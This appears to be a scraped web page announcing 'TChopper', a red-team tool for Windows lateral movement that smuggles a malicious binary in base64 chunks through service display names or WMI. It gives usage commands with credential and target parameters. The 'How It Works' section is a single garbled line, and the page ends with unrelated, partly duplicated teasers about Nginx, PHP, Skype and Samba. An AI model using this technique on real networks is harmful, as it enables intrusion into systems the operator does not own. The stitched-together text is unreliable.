TChopper, a new technique I have discovered recently and give it a nickname (Chop chop) to perform lateral movement using windows services display name and WMI by smuggling the malicious binary as base64 chunks and automate the process using the TChopper tool.
How It Works
while if you are conducting lateral movment using WMI technique you can also use Chopper to do that
Usage
#chop chop mode
chopper.exe -s -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
#chop chop done
chopper.exe -m -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
#use WMI to smuggle
chopper.exe -w -u DOMAIN\USERNAME -p PASSWORD -t MACHINE -f LOCALBINARYPATH
Nginx (pronounced "engine x") is a free, open-source, high-performance HTTP server and reverse proxy. It handles…
Nginx (pronounced "engine x") is a free, open-source, high-performance HTTP server and reverse proxy. It handles…
Let's Encrypt is a free, automated, and open certificate authority run by the Internet Security Research…
PHP is the most widely used server-side scripting language for web development. Ubuntu 18.04 ships with PHP…
Skype is one of the most widely used communication platforms in the world. It lets you…
Samba is a free, open-source implementation of the SMB/CIFS network protocol that lets Linux servers share…